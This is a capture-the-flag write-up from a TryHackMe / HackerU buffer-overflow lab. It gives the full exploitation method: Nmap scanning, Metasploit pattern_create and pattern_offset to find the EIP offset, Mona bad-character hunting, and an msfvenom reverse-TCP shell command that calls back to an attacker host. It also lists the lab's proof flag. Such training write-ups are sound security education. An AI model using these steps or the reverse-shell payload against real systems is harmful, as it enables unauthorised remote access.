Testing Organization

Buffer Overflow Red Team Batch 3

Challenge
Tester’s Name
pavanmsvs

TryHackme ID
noobsyntax

Test Date
03/07/2021

Copyright © 1996-2021 HackerU Ltd.

All Rights Reserved.
PURPOSE OF TESTING

Our purpose of this testing was to find vulnerability in the given application and using the vulnerability gain user
access.

TOOLS USED TO FIND THE SYSTEM AND VULNERABILITY

Nmap used to check at which port the application is running. Msfvenom to create payload metasploit-
framework tool to find offset value, pattern-creation.

GATHERING INFORMATION OF TARGET SYSTEM AND FINDING

we have to connect VPN to get access to get access to THM box

We will start with the NMAP scan

Page 2
From nmap scan we can see that there is only 2 port open and at port 31337 and 8888 our application is
running. We are already provided with a skeleton of the code we have to use that skeleton and modify it to gain
user access. From other port at bin directory we got the vulnerable application, downloaded it and transferred
it to our testing machine where we will test our code and try to gain user access

Page 3
We can download the vulnerable application and start testing in our windows machine
EXPLOITING THE TARGET

Now will start our testing in local development system by using the skeleton.

Page 4
Used the skeleton just modified the IP as shown with that of my local testing system. Opened the application in
the testing system with immunity debugger where we will watch the application details and how our code
affects the application

Page 5
As we can see that the application is running now will try our crash code by simply executing it in our attacking
system

As the application crashed from 500 “A” sent to it will create a pattern of that and will try crash attack once
more with our pattern to get the offset value

For this will have to use metasploit tool pattern_create.rb this script will create a random char pattern of the
length specified by us. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500 -l --> length of
the pattern now will put this pattern character in place of “A” in our skeleton code

Now we created the code with our pattern of 500 length and will execute this to get the offset value (exact
crash point of the application).

Page 6
After executing our code we see that we got EIP value which will use to find the offset of the application, and at
ESP address we can see our pattern is seen. For finding the offset we will use another metasploit tool
pattern_offset.rb this will give the application offset value

As seen above using the EIP value we found the offset of the application which is 146.. Now will use this value in
our code to control the EIP

Page 7
Will use the skeleton with the offset value in it and pass “B” extra character to get EIP control.

As seen at EIP we got our extra passed character’s ASCII value i.e. 42424242. AS we have controlled the EIP will
now find the bad character in the application. For this will use the built in Mona module of immunity debugger.
Will configure a log folder first and then will create a byte array using Mona module.

Page 8
!mona config -set workingfolder c:\logs\%p --> to configure log folder

!mona bytearray --> create bad char

Page 9
Once we created the bad character using mona will copy this in our code and execute it.

We can simply add this as bad and add to buffer or we can pass it as buff value after the given value of skeleton.
Once we execute our code we will get the bad character present in the application which we have to remove

Page 10
Page 11
!mona bytearray -b “\x00”

Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code

Page 12
We can see that it saying corruption after 0 bytes will remove that character from the bytearray and again
execute the code. To remove the bad character form log will use mona command.

!mona bytearray -b "\x00\x0a"

Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code.

Page 13
Page 14
Now we are set to create our payload using msfvenom to gain user control and get the shell access of the
testing system

Page 15
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.8 lport=4444 -b "\x00\x0a" -f python

-p --> payload used (here used tcp-reverse shell)

Lhost --> local host (our system IP)

Lport --> (the port at which we want to get the shell)

- b --> bad character to be removed from our payload

Copying this buff value in our code and changing it as per the skeleton provided, and adding the ESP value and
NOPs padding. Padding = "\x90" * 16

Page 16
Page 17
On executing our shell code got the local system shell thus we successfully created a shell code which gave the
local system access now will create payload for the THM machine as we are connected with VPN will use tun0 ip
in payload and change the target IP in our code

Page 18
Page 19
Proof flag: - 40E44BACF8B1464C8882D08160F6EF4A4FCC4676

We successfully got user access of the system and got the flag, Submitted the flag in THM

Page 20